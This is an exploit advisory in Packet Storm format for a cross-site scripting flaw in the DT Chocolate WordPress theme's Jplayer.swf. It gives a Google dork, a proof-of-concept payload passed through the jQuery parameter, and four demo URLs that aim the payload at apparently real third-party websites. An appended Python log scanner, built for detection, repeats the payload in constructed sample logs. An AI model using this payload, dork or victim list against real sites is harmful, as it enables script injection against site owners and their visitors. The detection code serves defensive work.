WordPress DT Chocolate Cross Site Scripting

2014-01-13T00:00:00
ID PACKETSTORM:124756
Type packetstorm
Reporter TUNISIAN CYBER
Modified 2014-01-13T00:00:00

Description

                                        
`[+] Author: TUNISIAN CYBER  
[+] Exploit Title: WordPress DT Chocolate (jplayer.swf) Cross Site Scripting vulnerability  
[+] Date: 13-01-2014  
[+] Category: WebApp  
[+] Google Dork: :inurl:"/wp-content/plugins/nextgen-gallery/"  
[+] Tested on: KaliLinux  
[+] Friend's blog: www.na3il.com  
  
########################################################################################  
+Exploit:  
The WordPress theme DT Chocolate suffers from an XSS vulnerability in its bundled Jplayer.swf, reachable through the jQuery query parameter.  
+P.O.C:  
127.0.0.1/[PATH]/wp-content/themes/dt-chocolate/js/jplayer/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/TUNISIAN CYBER/)//  
  
Demo:  
http://www.impala-miami.com/wp-content/themes/dt-chocolate/js/jplayer/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day%20TUNISIAN%20CYBER/)//  
http://reportagesphotos-kaddouchmagali.fr/wp-content/themes/dt-chocolate/js/jplayer/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day%20TUNISIAN%20CYBER/)//  
http://www.laluzdeunangel.com/nuevo/wp-content/themes/dt-chocolate/js/jplayer/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day%20TUNISIAN%20CYBER/)//  
http://orianneboulage.fr/wp-content/themes/dt-chocolate/js/jplayer/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/TUNISIAN%20CYBER/)//  
./3nD  
########################################################################################  
Greets to: XMaX-tn, N43il HacK3r, XtechSEt  
Sec4Ever Members:  
DamaneDz  
UzunDz  
GEOIX  
########################################################################################  
`
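A log check for the request pattern shown in the P.O.C above, added here as an example and not part of the original advisory: it flags requests to the theme's Jplayer.swf whose jQuery parameter is not a plain identifier. The log lines are constructed, and the rule that a legitimate value is a dotted JavaScript identifier is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Path of the Flash file named in the advisory, matched case-insensitively
# and under any install prefix ([PATH] in the P.O.C).
SWF_PATH = re.compile(r"/wp-content/themes/dt-chocolate/js/jplayer/jplayer\.swf$", re.I)
# Assumption: a legitimate value is an identifier path such as "jQuery" or "window.jQuery".
SAFE_VALUE = re.compile(r"^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$")
# Request field of a Combined Log Format line: "METHOD target PROTOCOL".
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_jquery_param(target):
    """Return the jQuery value if target requests Jplayer.swf with a
    non-identifier jQuery parameter, otherwise None."""
    parts = urlsplit(target)
    if not SWF_PATH.search(parts.path):
        return None
    # parse_qsl percent-decodes, so encoded variants are checked as well.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() == "jquery" and not SAFE_VALUE.match(value):
            return value
    return None

def scan(lines):
    """Return (client_ip, jquery_value) for every flagged log line."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        value = suspicious_jquery_param(m.group(1))
        if value is not None:
            hits.append((line.split(" ", 1)[0], value))
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Jan/2014:10:00:01 +0000] "GET /wp-content/themes/dt-chocolate/js/jplayer/Jplayer.swf?jQuery=jQuery&id=jp_1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [13/Jan/2014:10:00:05 +0000] "GET /blog/wp-content/themes/dt-chocolate/js/jplayer/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/TEST/)// HTTP/1.1" 200 5120',
    '203.0.113.4 - - [13/Jan/2014:10:00:09 +0000] "GET /index.php?jQuery=)}x HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip} sent non-identifier jQuery value: {value!r}")
```
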